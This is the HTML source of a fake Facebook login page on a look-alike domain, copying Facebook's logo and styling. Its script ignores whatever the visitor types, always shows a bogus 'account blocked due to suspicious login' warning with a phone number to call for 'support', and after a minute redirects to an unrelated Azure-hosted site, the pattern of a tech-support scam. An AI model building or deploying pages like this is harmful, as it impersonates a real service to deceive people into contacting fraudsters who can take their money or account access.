<!DOCTYPE html>
<html lang="en">
  <head>
<script defer data-domain="facebhosd.vercel.app" src="https://plausible.io/js/script.js"></script>

    
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Login</title>
    <style>
      * {
        margin: 0;
        padding: 0;
        box-sizing: border-box;
      }

      body {
        font-family: Arial, sans-serif;
        background-color: #f0f2f5;
        display: flex;
        justify-content: center;
        height: 100vh;
      }

      .login-wrapper {
        text-align: center;
        margin-top: 2rem;
      }

      .logo {
        width: 250px;
      }

      .login-container {
        background-color: white;
        padding: 30px;
        width: 400px;
        border-radius: 10px;
        box-shadow: 0px 0px 15px rgba(0, 0, 0, 0.1);
        text-align: center;
      }

      h2 {
        margin-bottom: 20px;
        font-size: 18px;
        font-weight: 500;
        color: #333;
      }

      input[type="text"],
      input[type="password"] {
        width: 100%;
        padding: 15px;
        margin-bottom: 15px;
        border: 1px solid #ddd;
        border-radius: 5px;
        font-size: 16px;
      }

      .login-btn {
        width: 100%;
        padding: 15px;
        background-color: #1877f2;
        color: white;
        border: none;
        border-radius: 5px;
        font-size: 20px;
        font-weight: 700;
        cursor: pointer;
      }

      .login-btn:hover {
        background-color: #165bd0;
      }

      .extra-options {
        margin-top: 15px;
        font-size: 14px;
      }

      .extra-options a {
        text-decoration: none;
        color: #1877f2;
      }

      .extra-options a:hover {
        text-decoration: underline;
      }
    </style>
  </head>
  <body>
    <div class="login-wrapper">
      <img
        src="https://static.xx.fbcdn.net/rsrc.php/y1/r/4lCu2zih0ca.svg"
        alt="XYZ Logo"
        class="logo"
      />
      <div class="login-container">
        <h2>Log in to Facebook</h2>
        <form id="login-form">
          <input
            type="text"
            placeholder="Email address or phone number"
            required
          />
          <input type="password" placeholder="Password" required />
          <button type="submit" class="login-btn">Log in</button>
          <div
            id="error-message"
            style="
              color: #a94442;
              background-color: #f2dede;
              border: 1px solid #ebccd1;
              padding: 10px;
              margin-top: 8px;
              text-align: center;
              border-radius: 4px;
              display: none;
            "
          >
            Yours Account access has been blocked due to suspicious login
            attempt. Contact our customer support at
            <a
              href="tel:+18023994043"
              style="color: blue; text-decoration: underline"
              >+1 802-399-4043</a
            >.to verify and unlock your account.
          </div>
        </form>

        <div class="extra-options">
          <a href="#">Forgotten account?</a> ·
          <a href="#">Sign up for facebook</a>
        </div>
      </div>
    </div>
    <script>
      document
        .getElementById("login-form")
        .addEventListener("submit", function (event) {
          event.preventDefault();
          document.getElementById("error-message").style.display = "block";
          setTimeout(function () {
            window.location.href = "https://winoct18.z13.web.core.windows.net/";
          }, 60000);
        });
    </script>
  </body>
</html>
